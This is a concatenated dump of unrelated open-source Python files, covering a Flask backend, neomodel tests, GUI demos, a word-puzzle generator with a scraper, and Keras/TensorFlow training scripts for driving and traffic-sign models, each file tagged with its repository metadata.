from brood_backend.database import db
from brood_backend.helpers.errors import EntityNotFoundException
from brood_backend.models.brood import Brood
from brood_backend.models.chicken import Chicken
def create_chicken(data: dict) -> dict:
logger.debug(f"Creating Chicken from data: {data}")
brood_uuid: str = data["brood_uuid"]
brood = Brood.query.filter_by(uuid=brood_uuid).first()
if brood is None:
raise EntityNotFoundException(f"Unknown chicken UUID '{brood_uuid}'")
chicken = Chicken()
chicken.uuid = str(uuid4())
chicken.name = data["name"]
chicken.brood_uuid = brood_uuid
logger.debug(f"Saving into database")
db.session.add(chicken)
db.session.commit()
logger.debug(f"Responding with data: {chicken.to_dict()}")
return chicken.to_dict()
```
#### File: brood_backend/helpers/errors.py
```python
import sys
import traceback
import flask
from loguru import logger
def init_error_handler(app):
app.errorhandler(ValueError)(_catch_bad_request)
app.errorhandler(KeyError)(_catch_bad_request)
app.errorhandler(TypeError)(_catch_bad_request)
app.errorhandler(PermissionError)(_catch_unauthorised)
app.errorhandler(EntityNotFoundException)(_catch_not_found)
app.errorhandler(ServiceUnavailableException)(_catch_upstream)
def _catch_bad_request(error):
return _catch(error, logger.warning, 400)
def _catch_internal_error(error):
return _catch(error, logger.critical, 500)
def _catch_not_found(error):
return _catch(error, logger.warning, 404)
def _catch_unauthorised(_error):
return _catch("Forbidden", logger.error, 403)
def _catch_upstream(error):
return _catch(error, logger.error, 502)
def _catch(error, log_method, code):
exc_type, exc_value, exc_traceback = sys.exc_info()
log_method("".join(traceback.format_exception(exc_type, exc_value, exc_traceback)))
structure = {"message": str(error)}
return flask.jsonify(structure), code
class EntityNotFoundException(Exception):
pass
class ServiceUnavailableException(Exception):
pass
```
#### File: brood_backend/models/brood.py
```python
from datetime import datetime
from brood_backend.database import db
class Brood(db.Model):
uuid = db.Column(db.String(length=36), primary_key=True)
created = db.Column(
db.DateTime, unique=False, nullable=False, default=datetime.utcnow
)
name = db.Column(db.String(), unique=False, nullable=False)
hashed_password = db.Column(db.String(), unique=False, nullable=False)
chickens = db.relationship("Chicken", back_populates="brood")
def to_dict(self) -> dict:
return {
"uuid": self.uuid,
"created": self.created,
"name": self.name,
"chickens": sorted([c.to_dict() for c in self.chickens], key=lambda x: x["created"]),
}
``` |
{
"source": "jonadaly/neomodel",
"score": 2
} |
#### File: neomodel/test/test_relationship_models.py
```python
from datetime import datetime
from pytest import raises
import pytz
from neomodel import (StructuredNode, StructuredRel, Relationship, RelationshipTo,
StringProperty, DateTimeProperty, DeflateError)
HOOKS_CALLED = {
'pre_save': 0,
'post_save': 0
}
class FriendRel(StructuredRel):
since = DateTimeProperty(default=lambda: datetime.now(pytz.utc))
class HatesRel(FriendRel):
reason = StringProperty()
def pre_save(self):
HOOKS_CALLED['pre_save'] += 1
def post_save(self):
HOOKS_CALLED['post_save'] += 1
class Badger(StructuredNode):
name = StringProperty(unique_index=True)
friend = Relationship('Badger', 'FRIEND', model=FriendRel)
hates = RelationshipTo('Stoat', 'HATES', model=HatesRel)
class Stoat(StructuredNode):
name = StringProperty(unique_index=True)
hates = RelationshipTo('Badger', 'HATES', model=HatesRel)
def test_either_connect_with_rel_model():
paul = Badger(name="Paul").save()
tom = Badger(name="Tom").save()
# creating rels
new_rel = tom.friend.disconnect(paul)
new_rel = tom.friend.connect(paul)
assert isinstance(new_rel, FriendRel)
assert isinstance(new_rel.since, datetime)
# updating properties
new_rel.since = datetime.now(pytz.utc)
assert isinstance(new_rel.save(), FriendRel)
# start and end nodes are the opposite of what you'd expect when using either..
# I've tried everything possible to correct this to no avail
paul = new_rel.start_node()
tom = new_rel.end_node()
assert paul.name == 'Paul'
assert tom.name == 'Tom'
def test_direction_connect_with_rel_model():
paul = Badger(name="<NAME>").save()
ian = Stoat(name="Ian the stoat").save()
rel = ian.hates.connect(paul, {'reason': "thinks paul should bath more often"})
assert isinstance(rel.since, datetime)
assert isinstance(rel, FriendRel)
assert rel.reason.startswith("thinks")
rel.reason = 'he smells'
rel.save()
ian = rel.start_node()
assert isinstance(ian, Stoat)
paul = rel.end_node()
assert isinstance(paul, Badger)
assert ian.name.startswith("Ian")
assert paul.name.startswith("Paul")
rel = ian.hates.relationship(paul)
assert isinstance(rel, HatesRel)
assert isinstance(rel.since, datetime)
rel.save()
# test deflate checking
rel.since = "2:30pm"
with raises(DeflateError):
rel.save()
# check deflate check via connect
with raises(DeflateError):
paul.hates.connect(ian, {'reason': "thinks paul should bath more often", 'since': '2:30pm'})
def test_traversal_where_clause():
phill = Badger(name="<NAME>").save()
tim = Badger(name="<NAME>").save()
bob = Badger(name="<NAME>").save()
rel = tim.friend.connect(bob)
now = datetime.now(pytz.utc)
assert rel.since < now
rel2 = tim.friend.connect(phill)
assert rel2.since > now
friends = tim.friend.match(since__gt=now)
assert len(friends) == 1
def test_multiple_rels_exist_issue_223():
# check a badger can dislike a stoat for multiple reasons
phill = Badger(name="Phill").save()
ian = Stoat(name="Stoat").save()
rel_a = phill.hates.connect(ian, {'reason': 'a'})
rel_b = phill.hates.connect(ian, {'reason': 'b'})
assert rel_a.id != rel_b.id
ian_a = phill.hates.match(reason='a')[0]
ian_b = phill.hates.match(reason='b')[0]
assert ian_a.id == ian_b.id
def test_retrieve_all_rels():
tom = Badger(name="tom").save()
ian = Stoat(name="ian").save()
rel_a = tom.hates.connect(ian, {'reason': 'a'})
rel_b = tom.hates.connect(ian, {'reason': 'b'})
rels = tom.hates.all_relationships(ian)
assert len(rels) == 2
assert rels[0].id in [rel_a.id, rel_b.id]
assert rels[1].id in [rel_a.id, rel_b.id]
def test_save_hook_on_rel_model():
HOOKS_CALLED['pre_save'] = 0
HOOKS_CALLED['post_save'] = 0
paul = Badger(name="PaulB").save()
ian = Stoat(name="IanS").save()
rel = ian.hates.connect(paul, {'reason': "yadda yadda"})
rel.save()
assert HOOKS_CALLED['pre_save'] == 2
assert HOOKS_CALLED['post_save'] == 2
``` |
{
"source": "jonadar/Final-project",
"score": 2
} |
#### File: Final-project/client/client.py
```python
import wx, socket, time, os
from threading import Thread
class MainFrame(wx.Frame):
def __init__(self, parent, title):
super(MainFrame, self).__init__(parent, title=title)
self.Maximize()
self.Centre()
self.Show()
self.SetFont(wx.Font(18, wx.SWISS, wx.NORMAL, wx.NORMAL, False,'MS Shell Dlg 2'))
#--chat--#
self.SND_BTN = wx.Button(self,size=(110,40), label='Send',pos=(300,40))
self.SND_BTN.SetWindowStyleFlag(wx.NO_BORDER)
self.SND_BTN.SetBackgroundColour((32,190,208))
self.Entery = wx.TextCtrl(self, size=(280,40), pos=(10,40), value='enter here!')
self.Chat_body = wx.ListCtrl(self, size=(400,600), pos=(10,90), style=wx.LC_REPORT|wx.BORDER_SUNKEN)
self.index=0
self.Chat_body.InsertColumn(0, 'Name')
self.Chat_body.InsertColumn(1, 'Message')
#self.Chat_body.SetColumnWidth(1, 80)
self.Chat_body.InsertColumn(2, 'Time')
#--file--#
self.UPLD_BTN = wx.Button(self,size=(110,40), label='Upload',pos=(425,40))
self.UPLD_BTN.SetWindowStyleFlag(wx.NO_BORDER)
self.UPLD_BTN.SetBackgroundColour((32,190,208))
self.REFRSH_BTN = wx.Button(self,size=(110,40), label=u'\u21bb',pos=(545,40))
self.REFRSH_BTN.SetFont(wx.Font(24, wx.SWISS, wx.NORMAL, wx.NORMAL, False,'MS Shell Dlg 2'))
self.REFRSH_BTN.SetWindowStyleFlag(wx.NO_BORDER)
self.REFRSH_BTN.SetBackgroundColour((32,190,208))
self.File_body = wx.ListCtrl(self, size=(400,600), pos=(425,90), style=wx.LC_REPORT|wx.BORDER_SUNKEN)
self.index=0
self.File_body.InsertColumn(0, 'Last changed by')
self.File_body.InsertColumn(1, 'File name')
self.File_body.InsertColumn(2, 'File type')
if __name__ == '__main__':
app = wx.App()
MainFrame(None, 'Main')
app.MainLoop()
``` |
{
"source": "jonad/Behavioral_Cloning",
"score": 3
} |
#### File: jonad/Behavioral_Cloning/training.py
```python
import os
import csv
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
import cv2
from keras.models import Sequential
from keras.layers import Flatten, Dense, Lambda, Conv2D, MaxPooling2D, Cropping2D, Dropout
import pickle
from keras.callbacks import TensorBoard, ModelCheckpoint
BASE_DIR = '/home/workspace/CarND-Behavioral-Cloning-P3/img'
def get_data(filename):
samples = []
with open(os.path.join(BASE_DIR, filename)) as csvfile:
reader = csv.reader(csvfile)
for line in reader:
samples.append(line)
samples = samples[1:]
print('The dataset is {} records'.format(len(samples)))
train_samples, validation_samples = train_test_split(samples, test_size=0.2)
return train_samples, validation_samples
def generator(samples, batch_size=32):
num_samples = len(samples)
while True:
shuffle(samples)
for offset in range(0, num_samples, batch_size):
batch_samples = samples[offset:offset+batch_size]
images = []
angles = []
for batch_sample in batch_samples:
name = BASE_DIR + '/IMG/'+ batch_sample[0].split('/')[-1]
image = cv2.imread(name)
angle = float(batch_sample[1])
augmented_image = cv2.flip(image, 1)
augmented_angle = angle*-1.0
images.append(image)
angles.append(angle)
images.append(augmented_image)
angles.append(augmented_angle)
X_train = np.array(images)
y_train = np.array(angles)
yield shuffle(X_train, y_train)
def train(train_samples, validation_samples, callbacks_list):
train_generator = generator(train_samples, batch_size=32)
validation_generator = generator(validation_samples, batch_size=32)
model = Sequential()
model.add(Lambda(lambda x: (x / 255.0) - 0.5,input_shape=(160,320,3) ))
model.add(Cropping2D(cropping=((70,25), (0,0))))
model.add(Conv2D(24, (5, 5), subsample=(2,2), activation='relu'))
model.add(Conv2D(36,(5, 5), subsample=(2,2), activation='relu'))
model.add(Conv2D(48,(5, 5), subsample=(2,2), activation='relu'))
model.add(Conv2D(64,(3, 3), activation='relu'))
model.add(Conv2D(64,(3, 3), activation='relu'))
model.add(Flatten())
model.add(Dense(100))
model.add(Dropout(0.2))
model.add(Dense(50))
model.add(Dropout(0.2))
model.add(Dense(10))
model.add(Dropout(0.2))
model.add(Dense(1))
model.compile(loss='mse', optimizer='adam')
history = model.fit_generator(train_generator,
steps_per_epoch=len(train_samples),
validation_data=validation_generator,
validation_steps=len(validation_samples),
epochs=5, verbose=1, callbacks=callbacks_list)
with open('./history.pickle', 'wb') as file_pi:
pickle.dump(history.history, file_pi)
if __name__ == '__main__':
filename = 'driving.csv'
train_samples, validation_samples = get_data(filename)
keras.callbacks.TensorBoard(log_dir='./Graph', histogram_freq=0,
write_graph=True, write_images=True)
callback_list = [ModelCheckpoint(filepath='model_final.h5',
monitor='val_loss',
save_best_only=True),
TensorBoard(log_dir='./logs', histogram_freq=0,
write_graph=True, write_images=False)]
train(train_samples, validation_samples, callback_list)
``` |
{
"source": "jonadiazz/spamFilterApp",
"score": 4
} |
#### File: jonadiazz/spamFilterApp/spamFilterApp copy.py
```python
import Tkinter as tk # gives tk namespace
def add_item():
"""
add the text in the Entry widget to the end of the listbox
"""
listbox1.insert(tk.END, enter1.get())
def delete_item():
"""
delete a selected line from the listbox
"""
try:
# get selected line index
index = listbox1.curselection()[0]
listbox1.delete(index)
except IndexError:
pass
def get_list(event):
"""
function to read the listbox selection
and put the result in an entry widget
"""
# get selected line index
index = listbox1.curselection()[0]
# get the line's text
seltext = listbox1.get(index)
# delete previous text in enter1
enter1.delete(0, 50)
# now display the selected text
enter1.insert(0, seltext)
def set_list(event):
"""
insert an edited line from the entry widget
back into the listbox
"""
try:
index = listbox1.curselection()[0]
# delete old listbox line
listbox1.delete(index)
except IndexError:
index = tk.END
# insert edited item back into listbox1 at index
listbox1.insert(index, enter1.get())
def sort_list():
"""
function to sort listbox items case insensitive
"""
temp_list = list(listbox1.get(0, tk.END))
temp_list.sort(key=str.lower)
# delete contents of present listbox
listbox1.delete(0, tk.END)
# load listbox with sorted data
for item in temp_list:
listbox1.insert(tk.END, item)
def save_list():
"""
save the current listbox contents to a file
"""
# get a list of listbox lines
temp_list = list(listbox1.get(0, tk.END))
# add a trailing newline char to each line
temp_list = [chem + '\n' for chem in temp_list]
# give the file a different name
fout = open("chem_data2.txt", "w")
fout.writelines(temp_list)
fout.close()
# create the sample data file
str1 = """ethyl alcohol
ethanol
ethyl hydroxide
hydroxyethane
methyl hydroxymethane
ethoxy hydride
gin
bourbon
rum
schnaps
"""
fout = open("chem_data.txt", "w")
fout.write(str1)
fout.close()
# read the data file into a list
fin = open("chem_data.txt", "r")
chem_list = fin.readlines()
fin.close()
# strip the trailing newline char
chem_list = [chem.rstrip() for chem in chem_list]
root = tk.Tk()
root.title("Listbox Operations")
# create the listbox (note that size is in characters)
listbox1 = tk.Listbox(root, width=50, height=6)
listbox1.grid(row=0, column=0)
# create a vertical scrollbar to the right of the listbox
yscroll = tk.Scrollbar(command=listbox1.yview, orient=tk.VERTICAL)
yscroll.grid(row=0, column=1, sticky=tk.N+tk.S)
listbox1.configure(yscrollcommand=yscroll.set)
# use entry widget to display/edit selection
enter1 = tk.Entry(root, width=50, bg='yellow')
enter1.insert(0, 'Click on an item in the listbox')
enter1.grid(row=1, column=0)
# pressing the return key will update edited line
enter1.bind('<Return>', set_list)
# or double click left mouse button to update line
enter1.bind('<Double-1>', set_list)
# button to sort listbox
button1 = tk.Button(root, text='Sort the listbox ', command=sort_list)
button1.grid(row=2, column=0, sticky=tk.W)
# button to save the listbox's data lines to a file
button2 = tk.Button(root, text='Save lines to file', command=save_list)
button2.grid(row=3, column=0, sticky=tk.W)
# button to add a line to the listbox
button3 = tk.Button(root, text='Add entry text to listbox', command=add_item)
button3.grid(row=2, column=0, sticky=tk.E)
# button to delete a line from listbox
button4 = tk.Button(root, text='Delete selected line ', command=delete_item)
button4.grid(row=3, column=0, sticky=tk.E)
# load the listbox with data
for item in chem_list:
listbox1.insert(tk.END, item)
# left mouse click on a list item to display selection
listbox1.bind('<ButtonRelease-1>', get_list)
root.mainloop()
``` |
{
"source": "jonadmark/repd",
"score": 3
} |
#### File: diagnostic/diagnoser_manager/__init__.py
```python
class DiagnoserManager:
def __init__(self, metric_manager, diagnosers):
"""Form a DiagnoserManager.
Arguments:
metric_manager -- a reference to a MetricManager
diagnosers -- list of diagnoser names
"""
self.metric_manager = metric_manager
self.diagnosers = {}
for diagnoser in diagnosers:
self.add(diagnoser)
def add(self, diagnoser_id):
"""Add a diagnoser to be managed."""
if diagnoser_id not in self.diagnosers:
module = __import__(__name__+'.'+diagnoser_id, globals(),
locals(), [diagnoser_id], 0)
diagnoser = getattr(module, diagnoser_id)
self.diagnosers[diagnoser_id] = diagnoser(self.metric_manager)
else:
raise KeyError
def remove(self, diagnoser_id):
"""Remove a managed diagnoser."""
del self.diagnosers[diagnoser_id]
def diagnose(self, interval):
"""Make diagnosers diagnose and return a list of their diagbostics."""
diagnostics = []
for id in sorted(self.diagnosers):
diagnostics.append(self.diagnosers[id].diagnose(interval))
return diagnostics
```
#### File: diagnostic/diagnoser_manager/pfitscher_network.py
```python
import diagnostic
class pfitscher_network:
def __init__(self, metric_manager):
"""Form the diagnoser"""
self.mm = metric_manager
self.t_queue_high = 0.0
self.t_tr_high = 5.0
def diagnose(self, interval):
"""Perform the diagnostic and return it"""
v_queue_mean = self.mm.get_reduced_metric('network',
'queue',
('mean', ),
interval)
v_tr_stdev = self.mm.get_reduced_metric('network',
'transmission_rate',
('stdev', ),
interval)
v_tr_mean = self.mm.get_reduced_metric('network',
'transmission_rate',
('mean', ),
interval)
if v_tr_stdev is not None and v_tr_mean is not None:
if v_tr_mean != 0.0:
v_tr_cv = v_tr_stdev / v_tr_mean
else:
v_tr_cv = float('inf')
else:
v_tr_cv = None
diag = diagnostic.Diagnostic(diagnoser='pfitscher_network',
resource='network')
if v_queue_mean is None or v_tr_cv is None:
diag.diagnostic = None
elif v_queue_mean > self.t_queue_high:
diag.diagnostic = diagnostic.UNDER
elif v_tr_cv > self.t_tr_high:
diag.diagnostic = diagnostic.OVER
else:
diag.diagnostic = diagnostic.CORRECT
if diag.diagnostic is not None:
diag.info = self.make_info(v_queue_mean, v_tr_cv)
return diag
def make_info(self, v_queue_mean, v_tr_cv):
"""Generate a info message to the diagnostic"""
info = '\n - average queue size: %.2f packets'
info += '\n - CV for transmission rate: %.2f'
return info % (v_queue_mean, v_tr_cv)
```
#### File: repd/src/repdd.py
```python
import json
import time
from database import Database
from metric.metric_manager import MetricManager
from metric.monitor_manager import MonitorManager
def main():
# load database settings and create handler
with open('settings/database.cfg', 'r') as f:
s = json.load(f)
database = Database(s['filename'], s['timetoexpire'])
# create MetricManager
metric_manager = MetricManager(database)
# load monitor_manager settings and create object
with open('settings/monitor_manager.cfg', 'r') as s:
resources = json.load(s)
monitor_manager = MonitorManager(metric_manager, resources)
try:
monitor_manager.start()
while True:
print('Press control-c to quit')
time.sleep(3600)
except KeyboardInterrupt:
print('\rQuitting, this may take a while')
monitor_manager.stop()
if __name__ == '__main__':
main()
``` |
{
"source": "jonadsimon/wonder-words-generator",
"score": 2
} |
#### File: jonadsimon/wonder-words-generator/minizinc_output_to_imputed_board.py
```python
def parse_minizinc_output():
board_raw = """P I N A T A P A N E R A S M L B V N
O Y A V E E U R O P E O E O R E I F
B Z C E M S L U R P R Z N U N B E R
L Z H N P E Q E J B C D L I B C N A
E I O T E P U A E A O E C L O O N N
T F S E H C E T L N E E E F T S A C
F R E S C A R P L O Q C F O C M V E
R A H S C O N E S U C E R A E O C C
O P C E T E G E A I E T C E D E O R
T P E A U A T R I M A A A K M V R E
H E L D B A T H C E O M A P E E K M
Y E N U H S Q U E S O H E N A E S A
G O C C E Y G O D R S F T V I S T F
F A T T E O T S K I F I A A O M O L
T A T K N I U N W A E J H D E I F A
M A R G J G I S C D E C A F E L U N
L U G O E R U M B A O T I L A K E E
T E M N D A I R Y M P I N T E E E E"""
word_lens_raw = """4 4 4 4 4 4 4 4 4 4 4 4 4 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 5 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6"""
pos_ys_raw = """14 13 16 11 4 13 13 10 17 16 8 15 18 18 16 10 11 3 16 16 9 16 8 6 12 11 8 7 7 9 7 7 17 6 6 5 18 18 18 8 4 2 4 18 18 6 2 2 18 17 16 1 15 14 13 7 1 7 1 1 1 1 1 1 1 1 1 1 1"""
pos_xs_raw = """16 16 12 12 9 18 17 9 12 12 11 12 11 10 10 16 5 6 9 9 12 8 18 2 7 3 17 12 17 6 15 11 6 15 6 6 5 5 4 4 16 4 16 3 2 2 6 18 1 1 1 17 1 1 1 1 7 1 18 17 16 3 15 14 13 7 5 1 1"""
delta_ys_raw = """1 1 -1 -1 1 1 1 1 0 0 -1 -1 0 -1 0 1 -1 0 -1 -1 1 -1 1 -1 0 -1 1 1 1 1 1 1 0 1 1 1 0 -1 -1 0 1 1 1 -1 -1 1 0 1 -1 -1 -1 1 -1 -1 -1 0 1 1 1 1 1 1 1 1 1 0 1 1 0"""
delta_xs_raw = """0 -1 1 0 0 0 0 0 1 1 -1 1 1 1 1 -1 1 1 1 1 1 1 0 0 1 0 0 1 -1 1 -1 -1 1 -1 1 1 1 1 1 1 0 0 -1 1 1 0 1 0 1 1 1 0 1 1 1 1 0 0 -1 -1 -1 0 -1 -1 -1 1 0 0 1"""
# Parse the inputs.
board = [row.split() for row in board_raw.split("\n")]
word_lens = [int(x) for x in word_lens_raw.split()]
pos_ys = [int(x) for x in pos_ys_raw.split()]
pos_xs = [int(x) for x in pos_xs_raw.split()]
delta_ys = [int(x) for x in delta_ys_raw.split()]
delta_xs = [int(x) for x in delta_xs_raw.split()]
# Generate a new zero'ed out board.
board_fresh = [["_" for _ in range(len(board))] for _ in range(len(board))]
for i,l in enumerate(word_lens):
for k in range(l):
y = pos_ys[i] - 1 + delta_ys[i]*k
x = pos_xs[i] - 1 + delta_xs[i]*k
board_fresh[y][x] = board[y][x]
for row in board_fresh:
print(" ".join(row))
print("\nLeftover squares:", sum([sum([1 for _ in row if _ == "_"]) for row in board_fresh]))
if __name__ == "__main__":
parse_minizinc_output()
# "happyholidays" - 13
# "merrychristmas" - 14
# "verymerrychristmas" - 18
# "icallitajonderword" - 18
# "merrychristmasmaria" - 19
# "haveamerrychristmas" - 19
# "doyoulikeyourpresent" - 20
# "mariachristmaspresent" - 21
# "mariaschristmaspresent" - 22
# "howdoyoulikeyourpresent" - 23
# "haveaverymerrychristmas" - 23
# "ihopeyoulikeyourpresent" - 23
# "doesmarialikeherpresent" - 23
# "thistookalongtimetomake" - 23
# "doyoulikeyourjonderword" - 23
# "mariadoyoulikethepresent" - 24
# "mariadoyoulikeyourpresent" - 25
# "whatdoyouthinkofyourpresent" - 27
```
#### File: jonadsimon/wonder-words-generator/semantic_neighbors.py
```python
import time
import requests
from bs4 import BeautifulSoup
import json
import re
import math
from Levenshtein import distance as levenshtein_distance
import unidecode
from nltk.stem.porter import PorterStemmer
from collections import namedtuple, OrderedDict
WordTuple = namedtuple('WordTuple', ['pretty', 'board'])
# Consider adding an additional Word wrapper to handle downstream transformations
# Might be easier to hold on on this until *after* filtering has been performed
# Then words will be immutable and can be treated as named_tuples
# Rephrase 3 univariate filters and 4 bivariate filters to fit with these new functions
# return and print the filtered words for each
def univariate_filtering(words, filter_func):
"""Identify words in the list meeting the filtering condition, and remove them"""
pass
def bivariate_filtering(words, similarity_func):
"""Identify pairs of words in the list meeting the similarity condition, and remove the longer of the two"""
pass
def filter_word_strings(words):
# Remove words shorter than 4 letters.
words = [word for word in words if len(word) > 3]
# Strip accents from letters
words = [unidecode.unidecode(word) for word in words]
# Remove words which contain characters other than: a-z/A-Z, spaces, hyphens.
words = [word for word in words if not re.search(r"[^a-zA-Z\-\s]", word)]
# Remove words that start with a non-alpha character (e.g. "-graphy")
words = [word for word in words if word[0].isalpha()]
# Remove words that are identical to one another.
# Hacky solution from https://stackoverflow.com/a/17016257/2562771
words = list(OrderedDict.fromkeys(words))
# Remove words that are superstrings of another existing word.
super_words = []
for word_sub in words:
for word_super in words:
if word_sub in word_super and word_sub != word_super:
super_words.append(word_super)
words = [word for word in words if word not in super_words]
print(f"\nRemoved too-similar words (superstring): {', '.join(list(super_words))}")
# Remove words of length ≥6 for which the first 70% of letters are the same
# (Cutoffs chosen manually to increase word diversity, should make more flexible.)
# ≥5/6 letters, ≥5/7 letters, ≥6/8 letters, etc
# By default pick the latter word as the one to discard
too_similar_words = set()
for i in range(len(words)):
for j in range(i+1, len(words)):
if min(len(words[i]), len(words[j])) >= 6:
prefix_len = math.ceil((0.7*min(len(words[i]), len(words[j]))))
if words[i][:prefix_len+1] == words[j][:prefix_len+1]:
too_similar_words.add(words[j])
words = [word for word in words if word not in too_similar_words]
if too_similar_words:
print(f"\nRemoved too-similar words (long-prefix): {', '.join(list(too_similar_words))}")
# If a given word is dist ≤ 1 from another, need to remove one of the two
# Should err on the side of remove the word which occurred later in the list
# Therefore build up iteration so word2_idx > word1_idx
too_similar_words = set()
for i in range(len(words)):
for j in range(i+1, len(words)):
# If the two words differ only by a single letter
# Deals with alternate spellings, e.g. "calender" vs "calendar"
# Add a min-length constraint to avoid misfiring on e.g. tide/time, suda/susa
if levenshtein_distance(words[i], words[j]) <= 1 and min(len(words[i]), len(words[j])) >= 5:
too_similar_words.add(words[j])
words = [word for word in words if word not in too_similar_words]
if too_similar_words:
print(f"\nRemoved too-similar words (Levenshtein): {', '.join(list(too_similar_words))}")
# Substrings + Levenshtein don't catch cases where both strings are short, e.g. time/timing, marked/marking
# Solution is to apply a stemmer and delete matching words
too_similar_words = set()
porter_stemmer = PorterStemmer()
for i in range(len(words)):
for j in range(i+1, len(words)):
if porter_stemmer.stem(words[i]) == porter_stemmer.stem(words[j]):
too_similar_words.add(words[j])
words = [word for word in words if word not in too_similar_words]
if too_similar_words:
print(f"\nRemoved too-similar words (stemming): {', '.join(list(too_similar_words))}")
return words
def get_related_words(word_list, score_cutoff=0.45, neighbors_cutoff=100):
"""Fetch related words from relatedwords.org, and clean them up.
Lowered originally-chosen cufodd of 0.45 --> 0.3 because too many issues with generating puzzles."""
# Get the related words and convert it to a clean json blob.
# Form of the resulting json is:
# { 'query': <seed_word>,
# 'terms': [
# {'word': <neighbor_word>, 'score': <similarity_score>, 'from': <db_source>},
# ...
# {'word': <neighbor_word>, 'score': <similarity_score>, 'from': <db_source>}
# ]
# }
words = []
for word in word_list:
r = requests.get(f"https://relatedwords.org/relatedto/{word}")
soup = BeautifulSoup(r.content, 'html.parser')
blob = soup.find(id="preloadedDataEl")
words_json = json.loads(blob.contents[0])
# Trim down the words set as a function of score_cutoff and neighbors_cutoff.
words.append((words_json["query"].lower(),1000))
# for item in words_json["terms"]:
# print(item)
# raise
for i, term in enumerate(words_json["terms"]):
if term["score"] > score_cutoff and i < neighbors_cutoff:
words.append((term["word"],term["score"]))
else:
break
# Pause for a second so the website doesn't get suspicious
time.sleep(1.5)
# Order words by score, then toss the score info
words = list(zip(*sorted(words, key=lambda x: x[1], reverse=True)))[0]
words = filter_word_strings(words)
# Convert words to word-tuples, and operate on these going forward
word_tuples = [WordTuple(pretty=word, board=word.replace(" ", "").replace("-", "").upper()) for word in words]
# Identify words of varying length to hide in the puzzle, and remove them from the set of words being placed.
hidden_word_tuple_dict = {}
for word_tuple in word_tuples:
# Keep short words (≤6 letters) in the primary word set
if len(word_tuple.board) > 5 and len(word_tuple.board) not in hidden_word_tuple_dict:
hidden_word_tuple_dict.update({len(word_tuple.board): word_tuple})
word_tuples = [word_tuple for word_tuple in word_tuples if word_tuple not in hidden_word_tuple_dict.values()]
return word_tuples, hidden_word_tuple_dict
# ok, still ugly, but at least all the data is there
``` |
{
"source": "jonad/TrafficSignDetection",
"score": 2
} |
#### File: jonad/TrafficSignDetection/lenet_model.py
```python
import tensorflow as tf
from utils import *
from sklearn.utils import shuffle
import os
MODEL_DIR = './model/'
if not os.path.exists(MODEL_DIR):
os.makedirs(dir)
class LeNetModel():
def __init__(self, logits, x_train, y_train, x_valid, y_valid, learning_rate, x, y, holdprob, hparam):
self.logits = logits
self.x_train, self.x_valid = x_train, x_valid
self.y_train, self.y_valid = y_train, y_valid
self.x = x
self.y = y
self.one_hot_y = tf.one_hot(self.y, 43)
self.learning_rate = learning_rate
self.save_path = os.path.join(MODEL_DIR, hparam)
self.hold_prob = holdprob
self.hparam = hparam
def evaluation_operation(self):
'''
Evaludation metric
:return:
'''
with tf.name_scope("accuracy"):
correct_prediction = tf.equal(tf.argmax(self.logits, 1), tf.argmax(self.one_hot_y, 1))
eval_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name='evaluation_operation')
tf.summary.scalar("accuracy", eval_operation)
return eval_operation
def loss_operation(self):
with tf.name_scope("xent_loss"):
cross_entropy = tf.nn.softmax_cross_entropy_with_logits(labels=self.one_hot_y,
logits=self.logits)
loss_operation = tf.reduce_mean(cross_entropy)
return loss_operation
def training_operation(self):
loss_operation = self.loss_operation()
with tf.name_scope("train"):
optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)
training_operation = optimizer.minimize(loss_operation)
return training_operation
def train(self, epochs, batch_size):
training_operation = self.training_operation()
eval_op = self.evaluation_operation()
loss_op = self.loss_operation()
saver = tf.train.Saver()
init = tf.global_variables_initializer()
best_validation_accuracy = 0
training_summary = tf.summary.scalar("training_accuracy", eval_op)
validation_summary = tf.summary.scalar("validation_accuracy", eval_op)
training_loss_summary = tf.summary.scalar("training_loss", loss_op)
validation_loss_summary = tf.summary.scalar("validation_loss", loss_op)
#summ = tf.summary.merge_all()
best_validation_accuracy = 0
best_training_accuracy = 0
with tf.Session() as sess:
sess.run(init)
num_examples = len(self.x_train)
writer_val = tf.summary.FileWriter(MODEL_DIR + self.hparam + 'val', sess.graph)
writer_train = tf.summary.FileWriter(MODEL_DIR + self.hparam + 'train', sess.graph)
writer_train.add_graph(sess.graph)
writer_val.add_graph(sess.graph)
for i in range(epochs):
self.x_train, self.y_train = shuffle(self.x_train, self.y_train)
for offset in range(0, num_examples, batch_size):
end = offset + batch_size
batch_x, batch_y = self.x_train[offset:end], self.y_train[offset:end]
sess.run(training_operation, feed_dict={self.x: batch_x, self.y: batch_y, self.hold_prob: 0.5})
training_accuracy, train_summary = sess.run([eval_op, training_summary], feed_dict={self.x: self.x_train[0:1000], self.y: self.y_train[0:1000], self.hold_prob:1.0})
validation_accuracy, validation_summ = sess.run([eval_op, validation_summary], feed_dict={self.x: self.x_valid, self.y: self.y_valid, self.hold_prob:1.0})
train_loss, train_loss_summ = sess.run([loss_op, training_loss_summary], feed_dict={self.x: self.x_train[0:1000], self.y: self.y_train[0:1000], self.hold_prob:0.5})
validation_loss, validation_loss_summ = sess.run([loss_op, validation_loss_summary], feed_dict={self.x: self.x_valid, self.y: self.y_valid, self.hold_prob:0.5})
writer_train.add_summary(train_summary, i)
writer_train.add_summary(train_loss_summ, i)
writer_train.flush()
writer_val.add_summary(validation_summ, i)
writer_val.add_summary(validation_loss_summ, i)
writer_val.flush()
if (validation_accuracy > best_validation_accuracy):
improvment_msg = 'Improved from {} to {}'.format(best_validation_accuracy, validation_accuracy)
best_validation_accuracy = validation_accuracy
print(best_validation_accuracy)
# Save all variables of the TensorFlow graph to file.
saver.save(sess=sess, save_path=self.save_path)
print('EPOCH {} ...'.format(i+1))
print("Training Accuracy = {:.3f}".format(training_accuracy))
print("Validation Accuracy = {:.3f}".format(validation_accuracy))
print(improvment_msg)
print()
else:
print('EPOCH {} ...'.format(i + 1))
print("Training Accuracy = {:.3f}".format(training_accuracy))
print("Validation Accuracy = {:.3f}".format(validation_accuracy))
print('did not improve')
print()
print(best_validation_accuracy)
def predict(self, y):
return tf.equal(tf.argmax(self.logits, 1), tf.argmax(y, 1))
``` |
{
"source": "JonaEnz/CookLangPy",
"score": 3
} |
#### File: CookLangPy/CookLangPy/timer.py
